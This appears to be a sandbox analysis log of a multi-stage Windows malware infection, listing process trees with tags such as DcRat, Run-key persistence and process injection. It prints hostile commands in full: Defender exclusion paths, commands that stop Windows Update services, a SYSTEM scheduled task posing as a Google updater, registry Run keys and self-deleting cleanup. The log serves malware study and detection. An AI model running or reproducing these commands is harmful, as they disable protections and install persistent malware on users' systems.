C:\Users\Admin\AppData\Local\Temp\IXP020.TMP\thoseintroductory.exeC:\Users\Admin\AppData\Local\Temp\IXP020.TMP\thoseintroductory.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP020.TMP\thoseintroductory.exeC:\Users\Admin\AppData\Local\Temp\IXP020.TMP\thoseintroductory.exe6⤵
- Adds Run key to start application
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Local\Temp\a\sus.exe"C:\Users\Admin\AppData\Local\Temp\a\sus.exe"3⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\a\nalo.exe"C:\Users\Admin\AppData\Local\Temp\a\nalo.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\amday.exe"C:\Users\Admin\AppData\Local\Temp\a\amday.exe"3⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe"4⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\rengad.exe"C:\Users\Admin\AppData\Local\Temp\a\rengad.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\a\sihost.exe"C:\Users\Admin\AppData\Local\Temp\a\sihost.exe"3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\a\sihost.exe"C:\Users\Admin\AppData\Local\Temp\a\sihost.exe"4⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
-
C:\Users\Admin\AppData\Local\Temp\a\carryspend.exe"C:\Users\Admin\AppData\Local\Temp\a\carryspend.exe"3⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\towardlowestpro.exeC:\Users\Admin\AppData\Local\Temp\IXP013.TMP\towardlowestpro.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\towardlowest.exeC:\Users\Admin\AppData\Local\Temp\IXP015.TMP\towardlowest.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\towardlowest.exeC:\Users\Admin\AppData\Local\Temp\IXP015.TMP\towardlowest.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP015.TMP\towardllowest.exeC:\Users\Admin\AppData\Local\Temp\IXP015.TMP\towardllowest.exe5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\stillkeyboard.exeC:\Users\Admin\AppData\Local\Temp\IXP013.TMP\stillkeyboard.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP013.TMP\stillkeyboard.exeC:\Users\Admin\AppData\Local\Temp\IXP013.TMP\stillkeyboard.exe5⤵
- Adds Run key to start application
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Local\Temp\a\sufferdemand.exe"C:\Users\Admin\AppData\Local\Temp\a\sufferdemand.exe"3⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\callcustomerpro.exeC:\Users\Admin\AppData\Local\Temp\IXP014.TMP\callcustomerpro.exe4⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\callcustomer.exeC:\Users\Admin\AppData\Local\Temp\IXP016.TMP\callcustomer.exe5⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\callcustomer.exeC:\Users\Admin\AppData\Local\Temp\IXP016.TMP\callcustomer.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP016.TMP\calllcustomer.exeC:\Users\Admin\AppData\Local\Temp\IXP016.TMP\calllcustomer.exe5⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\thoseintroductory.exeC:\Users\Admin\AppData\Local\Temp\IXP014.TMP\thoseintroductory.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\IXP014.TMP\thoseintroductory.exeC:\Users\Admin\AppData\Local\Temp\IXP014.TMP\thoseintroductory.exe5⤵
- Adds Run key to start application
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Local\Temp\a\windows.exe"C:\Users\Admin\AppData\Local\Temp\a\windows.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\a\w-12.exe"C:\Users\Admin\AppData\Local\Temp\a\w-12.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Users\Admin\AppData\Local\Temp\a\Creal.exe"C:\Users\Admin\AppData\Local\Temp\a\Creal.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\a\Creal.exe"C:\Users\Admin\AppData\Local\Temp\a\Creal.exe"4⤵
- Loads dropped DLL
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist"5⤵
-
C:\Users\Admin\AppData\Local\Temp\a\1712.exe"C:\Users\Admin\AppData\Local\Temp\a\1712.exe"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "1712" /t REG_SZ /F /D "C:\Users\Admin\Documents\1712.pif"4⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "1712" /t REG_SZ /F /D "C:\Users\Admin\Documents\1712.pif"5⤵
-
C:\Windows\SysWOW64\cmd.execmd /c Copy "C:\Users\Admin\AppData\Local\Temp\a\1712.exe" "C:\Users\Admin\Documents\1712.pif"4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\1712.exe"C:\Users\Admin\AppData\Local\Temp\a\1712.exe"4⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\a\kung.exe"C:\Users\Admin\AppData\Local\Temp\a\kung.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\a\kung.exe"C:\Users\Admin\AppData\Local\Temp\a\kung.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\kung.exe"C:\Users\Admin\AppData\Local\Temp\a\kung.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\kung.exe"C:\Users\Admin\AppData\Local\Temp\a\kung.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\win.exe"C:\Users\Admin\AppData\Local\Temp\a\win.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\a\Kriwgshughb.exe"C:\Users\Admin\AppData\Local\Temp\a\Kriwgshughb.exe"3⤵
- Modifies system certificate store
-
C:\Users\Admin\AppData\Local\Temp\a\build1111.exe"C:\Users\Admin\AppData\Local\Temp\a\build1111.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\a\build9999.exe"C:\Users\Admin\AppData\Local\Temp\a\build9999.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\a\lnstalIer.exe"C:\Users\Admin\AppData\Local\Temp\a\lnstalIer.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\trafico.exe"C:\Users\Admin\AppData\Local\Temp\a\trafico.exe"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"2⤵
-
C:\Windows\SysWOW64\wscript.exe"C:\Windows\SysWOW64\wscript.exe"2⤵
- Adds policy Run key to start application
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
- System policy modification
-
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Temp\a\smss.exe"3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\yjkibfzfvbok.xml"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"2⤵
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\iacrcjwhmdyc.xml"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\a\yes.exe"2⤵
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
-
C:\Users\Admin\AppData\Local\Temp\5DB2.exeC:\Users\Admin\AppData\Local\Temp\5DB2.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\5DB2.exeC:\Users\Admin\AppData\Local\Temp\5DB2.exe3⤵
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\7c928045-71fd-4079-a694-a05620c301e4" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\5DB2.exe"C:\Users\Admin\AppData\Local\Temp\5DB2.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\5DB2.exe"C:\Users\Admin\AppData\Local\Temp\5DB2.exe" --Admin IsNotAutoStart IsNotTask5⤵
-
C:\Users\Admin\AppData\Local\4697b235-4755-4015-ab55-0a0beec6fb1a\build2.exe"C:\Users\Admin\AppData\Local\4697b235-4755-4015-ab55-0a0beec6fb1a\build2.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\4697b235-4755-4015-ab55-0a0beec6fb1a\build2.exe"C:\Users\Admin\AppData\Local\4697b235-4755-4015-ab55-0a0beec6fb1a\build2.exe"7⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\4697b235-4755-4015-ab55-0a0beec6fb1a\build2.exe" & exit8⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\AppData\Local\4697b235-4755-4015-ab55-0a0beec6fb1a\build3.exe"C:\Users\Admin\AppData\Local\4697b235-4755-4015-ab55-0a0beec6fb1a\build3.exe"6⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\4697b235-4755-4015-ab55-0a0beec6fb1a\build3.exe"C:\Users\Admin\AppData\Local\4697b235-4755-4015-ab55-0a0beec6fb1a\build3.exe"7⤵
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"8⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Users\Admin\AppData\Local\Temp\70CD.exeC:\Users\Admin\AppData\Local\Temp\70CD.exe2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\85CD.dll2⤵
-
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\85CD.dll3⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\8BE9.exeC:\Users\Admin\AppData\Local\Temp\8BE9.exe2⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\9531.exeC:\Users\Admin\AppData\Local\Temp\9531.exe2⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Windows directory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Users\Admin\AppData\Local\Temp\1E67.exeC:\Users\Admin\AppData\Local\Temp\1E67.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"3⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"3⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
-
C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"C:\Users\Admin\AppData\Local\Temp\d21cbe21e38b385a41a68c5e6dd32f4c.exe"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
-
C:\Users\Admin\AppData\Local\Temp\kos2.exe"C:\Users\Admin\AppData\Local\Temp\kos2.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 296 -s 7524⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\latestX.exe"C:\Users\Admin\AppData\Local\Temp\latestX.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Drops file in Program Files directory
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"4⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\24A1.exeC:\Users\Admin\AppData\Local\Temp\24A1.exe2⤵
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\iacrcjwhmdyc.xml"2⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc3⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\explorer.exeC:\Windows\explorer.exe3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\iacrcjwhmdyc.xml"3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc3⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc3⤵
-
C:\Windows\System32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"3⤵
-
